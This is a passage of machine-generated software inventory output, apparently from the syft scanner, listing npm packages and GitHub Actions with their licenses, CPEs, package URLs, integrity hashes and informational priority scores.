syft-generated purl: pkg:npm/%40types/ms@2.1.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@types/ms/-/ms-2.1.0.tgz integrity: sha512-GsCCIZDE/p3i96vtEqx+7dBUGXrc7zeSK3wwPHIaRThS+9OhWIXRqzs4d6k1SVU8g91DrNRWxWUGhp5KXQb2VA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 191b23786146803d ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @types/node 20.19.39' title: '@types/node 20.19.39' description: 'Package discovered: @types/node 20.19.39' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: c19052194c7f9053 name: '@types/node' version: 20.19.39 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@types\/node:\@types\/node:20.19.39:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40types/node@20.19.39 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@types/node/-/node-20.19.39.tgz integrity: sha512-orrrD74MBUyK8jOAD/r0+lfa1I2MO6I+vAkmAWzMYbCcgrN4lCrmK52gRFQq/JRxfYPfonkr4b0jcY7Olqdqbw== dependencies: undici-types: ~6.21.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 9b5805676545e7d1 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @types/node 22.19.17' title: '@types/node 22.19.17' description: 'Package discovered: @types/node 22.19.17' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: b0b14dd646c615be name: '@types/node' version: 22.19.17 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@types\/node:\@types\/node:22.19.17:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40types/node@22.19.17 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@types/node/-/node-22.19.17.tgz integrity: sha512-wGdMcf+vPYM6jikpS/qhg6WiqSV/OhG+jeeHT/KlVqxYfD40iYJf9/AE1uQxVWFvU7MipKRkRv8NSHiCGgPr8Q== dependencies: undici-types: ~6.21.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 08409c71d4ce88d9 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @types/request 2.48.13' title: '@types/request 2.48.13' description: 'Package discovered: @types/request 2.48.13' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 656ffeda0aaf4e8b name: '@types/request' version: 2.48.13 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@types\/request:\@types\/request:2.48.13:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40types/request@2.48.13 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@types/request/-/request-2.48.13.tgz integrity: sha512-FGJ6udDNUCjd19pp0Q3iTiDkwhYup7J8hpMW9c4k53NrccQFFWKRho6hvtPPEhnXWKvukfwAlB6DbDz4yhH5Gg== dependencies: '@types/caseless': '*' '@types/node': '*' '@types/tough-cookie': '*' form-data: ^2.5.5 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: dd961f2e03e7418d ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @types/tough-cookie 4.0.5' title: '@types/tough-cookie 4.0.5' description: 'Package discovered: @types/tough-cookie 4.0.5' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: cf24fb05ea581070 name: '@types/tough-cookie' version: 4.0.5 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@types\/tough-cookie:\@types\/tough-cookie:4.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/tough-cookie:\@types\/tough_cookie:4.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/tough_cookie:\@types\/tough-cookie:4.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/tough_cookie:\@types\/tough_cookie:4.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/tough:\@types\/tough-cookie:4.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/tough:\@types\/tough_cookie:4.0.5:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40types/tough-cookie@4.0.5 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@types/tough-cookie/-/tough-cookie-4.0.5.tgz integrity: sha512-/Ad8+nIOV7Rl++6f1BdKxFSMgmoqEoYbHRpPcx3JEfv8VRsQe9Z4mCXeJBzxs7mbHY/XOZZuXlRNfhpVPbs6ZA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 7a188cdbd82f20f1 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @types/ws 8.18.1' title: '@types/ws 8.18.1' description: 'Package discovered: @types/ws 8.18.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 919683ef9260890b name: '@types/ws' version: 8.18.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@types\/ws:\@types\/ws:8.18.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40types/ws@8.18.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@types/ws/-/ws-8.18.1.tgz integrity: sha512-ThVF6DCVhA8kUGy+aazFQ4kXQ7E1Ty7A3ypFOe0IcJV8O/M511G99AW24irKrW56Wt44yG9+ij8FaqoBGkuBXg== dependencies: '@types/node': '*' compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 89056081bb223fd4 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: abbrev 2.0.0' title: abbrev 2.0.0 description: 'Package discovered: abbrev 2.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 0277554910df9b38 name: abbrev version: 2.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:abbrev:abbrev:2.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/abbrev@2.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/abbrev/-/abbrev-2.0.0.tgz integrity: sha512-6/mh1E2u2YgEsCHdY0Yx5oW+61gZU+1vXaoiHHrpKeuRNNgFvS+/jrwHiQhB5apAf5oB7UB7E19ol2R2LKH8hQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 873a6392b6c08a39 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: abort-controller 3.0.0' title: abort-controller 3.0.0 description: 'Package discovered: abort-controller 3.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 02974b3dbbe4d3d6 name: abort-controller version: 3.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:abort-controller:abort-controller:3.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:abort-controller:abort_controller:3.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:abort_controller:abort-controller:3.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:abort_controller:abort_controller:3.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:abort:abort-controller:3.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:abort:abort_controller:3.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/abort-controller@3.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/abort-controller/-/abort-controller-3.0.0.tgz integrity: sha512-h8lQ8tacZYnR3vNQTgibj+tODHI5/+l06Au2Pcriv/Gmet0eaj4TwWH41sO9wnHDiQsEj19q0drzdWdeAHtweg== dependencies: event-target-shim: ^5.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 661684530a17a73f ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: abs-svg-path 0.1.1' title: abs-svg-path 0.1.1 description: 'Package discovered: abs-svg-path 0.1.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 2eb8f1fab63663a1 name: abs-svg-path version: 0.1.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:abs-svg-path:abs-svg-path:0.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:abs-svg-path:abs_svg_path:0.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:abs_svg_path:abs-svg-path:0.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:abs_svg_path:abs_svg_path:0.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:abs-svg:abs-svg-path:0.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:abs-svg:abs_svg_path:0.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:abs_svg:abs-svg-path:0.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:abs_svg:abs_svg_path:0.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:abs:abs-svg-path:0.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:abs:abs_svg_path:0.1.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/abs-svg-path@0.1.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/abs-svg-path/-/abs-svg-path-0.1.1.tgz integrity: sha512-d8XPSGjfyzlXC3Xx891DJRyZfqk5JU0BJrDQcsWomFIV1/BIzPW5HDH5iDdWpqWaav0YVIEzT1RHTwWr0FFshA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 27802507a1dbe242 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: accepts 1.3.8' title: accepts 1.3.8 description: 'Package discovered: accepts 1.3.8' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: e96668e505272792 name: accepts version: 1.3.8 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:accepts:accepts:1.3.8:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/accepts@1.3.8 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/accepts/-/accepts-1.3.8.tgz integrity: sha512-PYAthTa2m2VKxuvSD3DPC/Gy+U+sOA1LAuT8mkmRuvw+NACSaeXEQ+NHcVF7rONl6qcaxV3Uuemwawk+7+SJLw== dependencies: mime-types: ~2.1.34 negotiator: 0.6.3 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 352cd9201a8ce90d ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /node_modules/@ungap/structured-clone/.github/workflows/node.js.yml startLine: 0 message: 'Package discovered: actions/checkout v2' title: actions/checkout v2 description: 'Package discovered: actions/checkout v2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: b54bfb1da26ce9cd name: actions/checkout version: v2 type: github-action foundBy: github-actions-usage-cataloger locations: - path: /node_modules/@ungap/structured-clone/.github/workflows/node.js.yml accessPath: /node_modules/@ungap/structured-clone/.github/workflows/node.js.yml annotations: evidence: primary licenses: [] language: '' cpes: - cpe: cpe:2.3:a:actions\/checkout:actions\/checkout:v2:*:*:*:*:*:*:* source: syft-generated purl: pkg:github/actions/checkout@v2 metadataType: github-actions-use-statement metadata: value: actions/checkout@v2 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 3e33aad3d5646f4e ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /node_modules/busboy/.github/workflows/ci.yml startLine: 0 message: 'Package discovered: actions/checkout v2' title: actions/checkout v2 description: 'Package discovered: actions/checkout v2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 8939931398f7f376 name: actions/checkout version: v2 type: github-action foundBy: github-actions-usage-cataloger locations: - path: /node_modules/busboy/.github/workflows/ci.yml accessPath: /node_modules/busboy/.github/workflows/ci.yml annotations: evidence: primary licenses: [] language: '' cpes: - cpe: cpe:2.3:a:actions\/checkout:actions\/checkout:v2:*:*:*:*:*:*:* source: syft-generated purl: pkg:github/actions/checkout@v2 metadataType: github-actions-use-statement metadata: value: actions/checkout@v2 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: c9bdf9f43faeb29d ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /node_modules/busboy/.github/workflows/lint.yml startLine: 0 message: 'Package discovered: actions/checkout v2' title: actions/checkout v2 description: 'Package discovered: actions/checkout v2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 9ed4a1365893a541 name: actions/checkout version: v2 type: github-action foundBy: github-actions-usage-cataloger locations: - path: /node_modules/busboy/.github/workflows/lint.yml accessPath: /node_modules/busboy/.github/workflows/lint.yml annotations: evidence: primary licenses: [] language: '' cpes: - cpe: cpe:2.3:a:actions\/checkout:actions\/checkout:v2:*:*:*:*:*:*:* source: syft-generated purl: pkg:github/actions/checkout@v2 metadataType: github-actions-use-statement metadata: value: actions/checkout@v2 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: b70772177f81ea1d ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /node_modules/streamsearch/.github/workflows/ci.yml startLine: 0 message: 'Package discovered: actions/checkout v2' title: actions/checkout v2 description: 'Package discovered: actions/checkout v2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: bf473f4674a4b4c1 name: actions/checkout version: v2 type: github-action foundBy: github-actions-usage-cataloger locations: - path: /node_modules/streamsearch/.github/workflows/ci.yml accessPath: /node_modules/streamsearch/.github/workflows/ci.yml annotations: evidence: primary licenses: [] language: '' cpes: - cpe: cpe:2.3:a:actions\/checkout:actions\/checkout:v2:*:*:*:*:*:*:* source: syft-generated purl: pkg:github/actions/checkout@v2 metadataType: github-actions-use-statement metadata: value: actions/checkout@v2 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: ec35dedecdc67bae ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /node_modules/streamsearch/.github/workflows/lint.yml startLine: 0 message: 'Package discovered: actions/checkout v2' title: actions/checkout v2 description: 'Package discovered: actions/checkout v2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 7ec5891cc205a593 name: actions/checkout version: v2 type: github-action foundBy: github-actions-usage-cataloger locations: - path: /node_modules/streamsearch/.github/workflows/lint.yml accessPath: /node_modules/streamsearch/.github/workflows/lint.yml annotations: evidence: primary licenses: [] language: '' cpes: - cpe: cpe:2.3:a:actions\/checkout:actions\/checkout:v2:*:*:*:*:*:*:* source: syft-generated purl: pkg:github/actions/checkout@v2 metadataType: github-actions-use-statement metadata: value: actions/checkout@v2 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 4424fb771af041f1 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /node_modules/stream-shift/.github/workflows/test.yml startLine: 0 message: 'Package discovered: actions/checkout v3' title: actions/checkout v3 description: 'Package discovered: actions/checkout v3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 8effbdc22037c585 name: actions/checkout version: v3 type: github-action foundBy: github-actions-usage-cataloger locations: - path: /node_modules/stream-shift/.github/workflows/test.yml accessPath: /node_modules/stream-shift/.github/workflows/test.yml annotations: evidence: primary licenses: [] language: '' cpes: - cpe: cpe:2.3:a:actions\/checkout:actions\/checkout:v3:*:*:*:*:*:*:* source: syft-generated purl: pkg:github/actions/checkout@v3 metadataType: github-actions-use-statement metadata: value: actions/checkout@v3 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: a9754521213a3bbe ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /node_modules/reusify/.github/workflows/ci.yml startLine: 0 message: 'Package discovered: actions/checkout v4' title: actions/checkout v4 description: 'Package discovered: actions/checkout v4' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: fd10fce47017fa13 name: actions/checkout version: v4 type: github-action foundBy: github-actions-usage-cataloger locations: - path: /node_modules/reusify/.github/workflows/ci.yml accessPath: /node_modules/reusify/.github/workflows/ci.yml annotations: evidence: primary licenses: [] language: '' cpes: - cpe: cpe:2.3:a:actions\/checkout:actions\/checkout:v4:*:*:*:*:*:*:* source: syft-generated purl: pkg:github/actions/checkout@v4 metadataType: github-actions-use-statement metadata: value: actions/checkout@v4 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: d2f68bf6461c8bf2 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /node_modules/busboy/.github/workflows/ci.yml startLine: 0 message: 'Package discovered: actions/setup-node v1' title: actions/setup-node v1 description: 'Package discovered: actions/setup-node v1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 6b0792dcccc67817 name: actions/setup-node version: v1 type: github-action foundBy: github-actions-usage-cataloger locations: - path: /node_modules/busboy/.github/workflows/ci.yml accessPath: /node_modules/busboy/.github/workflows/ci.yml annotations: evidence: primary licenses: [] language: '' cpes: - cpe: cpe:2.3:a:actions\/setup-node:actions\/setup-node:v1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:actions\/setup-node:actions\/setup_node:v1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:actions\/setup_node:actions\/setup-node:v1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:actions\/setup_node:actions\/setup_node:v1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:actions\/setup:actions\/setup-node:v1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:actions\/setup:actions\/setup_node:v1:*:*:*:*:*:*:* source: syft-generated purl: pkg:github/actions/setup-node@v1 metadataType: github-actions-use-statement metadata: value: actions/setup-node@v1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: e6602c50b5a9ed75 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /node_modules/busboy/.github/workflows/lint.yml startLine: 0 message: 'Package discovered: actions/setup-node v1' title: actions/setup-node v1 description: 'Package discovered: actions/setup-node v1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 0dc9162b75e9df6b name: actions/setup-node version: v1 type: github-action foundBy: github-actions-usage-cataloger locations: - path: /node_modules/busboy/.github/workflows/lint.yml accessPath: /node_modules/busboy/.github/workflows/lint.yml annotations: evidence: primary licenses: [] language: '' cpes: - cpe: cpe:2.3:a:actions\/setup-node:actions\/setup-node:v1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:actions\/setup-node:actions\/setup_node:v1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:actions\/setup_node:actions\/setup-node:v1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:actions\/setup_node:actions\/setup_node:v1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:actions\/setup:actions\/setup-node:v1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:actions\/setup:actions\/setup_node:v1:*:*:*:*:*:*:* source: syft-generated purl: pkg:github/actions/setup-node@v1 metadataType: github-actions-use-statement metadata: value: actions/setup-node@v1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 75e343f3c07ad957 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /node_modules/streamsearch/.github/workflows/ci.yml startLine: 0 message: 'Package discovered: actions/setup-node v1' title: actions/setup-node v1 description: 'Package discovered: actions/setup-node v1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 303b3812127b618f name: actions/setup-node version: v1 type: github-action foundBy: github-actions-usage-cataloger locations: - path: /node_modules/streamsearch/.github/workflows/ci.yml accessPath: /node_modules/streamsearch/.github/workflows/ci.yml annotations: evidence: primary licenses: [] language: '' cpes: - cpe: cpe:2.3:a:actions\/setup-node:actions\/setup-node:v1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:actions\/setup-node:actions\/setup_node:v1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:actions\/setup_node:actions\/setup-node:v1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:actions\/setup_node:actions\/setup_node:v1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:actions\/setup:actions\/setup-node:v1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:actions\/setup:actions\/setup_node:v1:*:*:*:*:*:*:* source: syft-generated purl: pkg:github/actions/setup-node@v1 metadataType: github-actions-use-statement metadata: value: actions/setup-node@v1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: f81ee12d2fe7942d ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /node_modules/streamsearch/.github/workflows/lint.yml startLine: 0 message: 'Package discovered: actions/setup-node v1' title: actions/setup-node v1 description: 'Package discovered: actions/setup-node v1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 5dcd76ce8f7aa30c name: actions/setup-node version: v1 type: github-action foundBy: github-actions-usage-cataloger locations: - path: /node_modules/streamsearch/.github/workflows/lint.yml accessPath: /node_modules/streamsearch/.github/workflows/lint.yml annotations: evidence: primary licenses: [] language: '' cpes: - cpe: cpe:2.3:a:actions\/setup-node:actions\/setup-node:v1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:actions\/setup-node:actions\/setup_node:v1:*:*:*:*:*:*:* source: syft-generated - cpe: 